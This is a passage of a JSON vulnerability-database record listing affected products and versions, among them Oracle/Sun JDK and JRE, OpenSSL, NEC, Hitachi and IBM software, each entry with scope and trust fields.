"oracle", "version": null }, { "model": "jdk 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.8.020" }, { "model": "jre 1.5.0 26", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 26", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 30", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 15", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.5.0 39", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 14", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 17", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk 18", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jdk", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7" }, { "model": "jre 1.6.0 30", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 02", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 01", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 12", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 07", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 14", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 02", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 12", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 13", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.691" }, { "model": "jre 1.5.0 13", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0 35", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 45", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 23", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 65", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 51", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 27", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0:update 60", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7.067" }, { "model": "jdk 1.7.0 12", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre 04", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jdk 1.5.0 38", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.7.0 11", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.5.071" }, { "model": "jdk 1.7.0 4", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.7.067" }, { "model": "jdk 1.5.0 20", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.5.0 23", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 22", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 06", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.6" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.776" }, { "model": "jre update", "scope": "eq", "trust": 0.9, "vendor": "oracle", "version": "1.8.020" }, { "model": "jre 1.6.0 25", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jre 1.5.0 40", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.7.0 9", "scope": null, "trust": 0.9, "vendor": "oracle", "version": null }, { "model": "jdk 1.6.0 18", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 19", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 14", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0 33", "scope": null, "trust": 0.9, "vendor": "sun", "version": null }, { "model": "jre 22", "scope": "eq", "trust": 0.9, "vendor": "sun", "version": "1.5" }, { "model": null, "scope": null, "trust": 0.8, "vendor": "apple", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "google", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "microsoft", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "nec", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "openssl", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "opera", "version": null }, { "model": null, "scope": null, "trust": 0.8, "vendor": "research in motion rim", "version": null }, { "model": "enterpriseidentitymanager", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": null }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "hs series" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v4.2 to v6.5" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v4.1 to v6.5" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard v8.2 to v9.2" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard-j edition v7.1 to v8.1" }, { "model": "webotx sip application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "standard edition v7.1 to v8.1" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator v3.1.0.x to v4.1.0.x" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "hs series all versions" }, { "model": "sparc enterprise m3000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.2" }, { "model": "cosminexus studio", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 5" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.5.1.1" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21 and earlier" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "2260" }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "sparc enterprise m4000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ix3000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent versions" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "ucosminexus developer standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "enterpriseidentitymanager", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver2.0 to 8.0" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 81 and earlier" }, { "model": "ucosminexus application server smart edition", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.3.0.0" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard-j edition v7.1 to v8.1" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "cosminexus developer version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33 and earlier" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard edition v4.2 to v6.5" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.10 to 10.10.2" }, { "model": "cosminexus developer standard version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(fujitsu m10-1/m10-4/m10-4s server )" }, { "model": "cosminexus developer professional version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "database", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "server 12.1.0.2" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base (hs15-019)" }, { "model": "application server", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "sparc enterprise m5000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional for plug-in" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.7" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- messaging" }, { "model": "cosminexus application server version 5", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r3" }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.6.1.0.0" }, { "model": "express5800", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "/sigmablade em card (n8405-019/019a/043) firmware rev.14.02 before" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "cosminexus developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "database", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "server 12.1.0.1" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "certd 10.0" }, { "model": "ucosminexus developer light", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard v8.2 to v9.2" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7500/nv5500/nv3500 series" }, { "model": "cosminexus developer light version 6", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "ucosminexus service platform", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "none" }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "nv7400/nv5400/nv3400 series" }, { "model": "cosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "-r" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.3.0" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle endeca server 7.4.0.0" }, { "model": "cosminexus application server enterprise", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "ucosminexus server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "st ard-r" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c cmm all versions" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator probe option ver3.1.0.x to ver4.1.0.x" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 91 and earlier" }, { "model": "ucosminexus operator", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle business intelligence enterprise edition 11.1.1.9" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "10" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.0 update 81 and earlier" }, { "model": "webotx application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard edition v7.1" }, { "model": "xcp", "scope": "lt", "trust": 0.8, "vendor": "oracle", "version": "(sparc enterprise m3000/m4000/m5000/m8000/m9000 server )" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "certd 8.0r3 (with db plugin patch 2)" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "jobcenter r14.1" }, { "model": "application server for developers", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base" }, { "model": "webotx", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard-j edition v4.1 to v6.5" }, { "model": "cosminexus primary server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "base version 6 (hs15-018)" }, { "model": "ucosminexus service architect", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus application server enterprise", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "hp icewall federation agent", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "3.0" }, { "model": "cosminexus application server standard", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "version 6" }, { "model": "hp icewall mcrp", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "2.1" }, { "model": "systemdirector enterprise", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "for java ( all models ) v5.1 to v7.2" }, { "model": "developer\u0027s kit for java", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "ucosminexus client", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "for plug-in" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.9.5" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "express" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "6 update 91 and earlier" }, { "model": "sparc enterprise m9000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "istorage", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ne series ver.002.05.00 later versions" }, { "model": "web server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "- security enhancement" }, { "model": "webotx sip application server", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "st ard edition v7.1 to v8.1" }, { "model": "ucosminexus application server", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "light" }, { "model": "mac os x", "scope": "eq", "trust": 0.8, "vendor": "apple", "version": "10.8.5" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator agent ver3.3 to ver4.1" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r2" }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "01" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "univerge", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "3c ucm v8.5.4 before" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "ix2000 series", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "ver.8.7.22 all subsequent versions" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.0" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 8.0 r1" }, { "model": "jrockit", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "r28.3.5 and earlier" }, { "model": "hp icewall sso", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "dfw 10.0" }, { "model": "xcp", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "1120" }, { "model": "websam", "scope": "eq", "trust": 0.8, "vendor": "nec", "version": "application navigator manager ver3.2.2 to ver4.1" }, { "model": "jre", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "6 update 21 and earlier" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle exalogic infrastructure 2.0.6.2" }, { "model": "ucosminexus application server standard", "scope": null, "trust": 0.8, "vendor": "hitachi", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "sparc enterprise m8000 server", "scope": null, "trust": 0.8, "vendor": "oracle", "version": null }, { "model": "ucosminexus developer", "scope": "eq", "trust": 0.8, "vendor": "hitachi", "version": "professional" }, { "model": "jdk", "scope": "lte", "trust": 0.8, "vendor": "sun microsystems", "version": "5.0 update 33 and earlier" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "ops center 12.2.1" }, { "model": "jdk 01-b06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.6" }, { "model": "jre 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "jdk .0 04", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "jdk .0 03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 1.6.0 38", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jre 1.6.0 2", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "jdk 07-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jdk 06", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 08", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 12", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 34", "scope": null, "trust": 0.6, "vendor": "oracle", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.6, "vendor": "oracle", "version": "1.8" }, { "model": "jdk 1.5.0.0 09", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.5.0.0 11", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 11-b03", "scope": "eq", "trust": 0.6, "vendor": "sun", "version": "1.5" }, { "model": "jre 1.5.0.0 07", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jdk 1.6.0 01", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "jre 1.6.0 20", "scope": null, "trust": 0.6, "vendor": "sun", "version": null }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.2.0.1" }, { "model": "bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.0" }, { "model": "bbm protected on blackberry", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.1.1767" }, { "model": "rational doors next generation", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "bbm on blackberry os", "scope": "ne", "trust": 0.3, "vendor": "blackberry", "version": "1010.3.1.1767" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.039" }, { "model": "jdk update17", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.1" }, { "model": "security access manager for web", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.17" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "rational developer for power systems software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.22" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.0.2" }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "buildforge ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.28" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "websphere real time sr8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.1" }, { "model": "jdk update3", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70007.5" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.306" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.055" }, { "model": "netezza platform software 7.2.0.4-p3", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.5" }, { "model": "hunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1" }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.1" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.42" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.025" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.6.1.0.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.3" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "rational automation framework ifix5", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "sametime community server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9" }, { "model": "norman shark scada protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.04" }, { "model": "cognos planning interim fix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.1.1.4" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "splunk", "scope": "ne", "trust": 0.3, "vendor": "splunk", "version": "6.1.7" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "system m2 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355041980" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.0.47" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "cloud manager interim fix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.0.3" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.12" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.22" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "sterling control center ifix01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.4.21" }, { "model": "java sdk sr16-fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.02" }, { "model": "java sdk sr4-fp2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "api management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x310025820" }, { "model": "websphere real time sr2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "tivoli storage flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1.0.0" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.2" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": 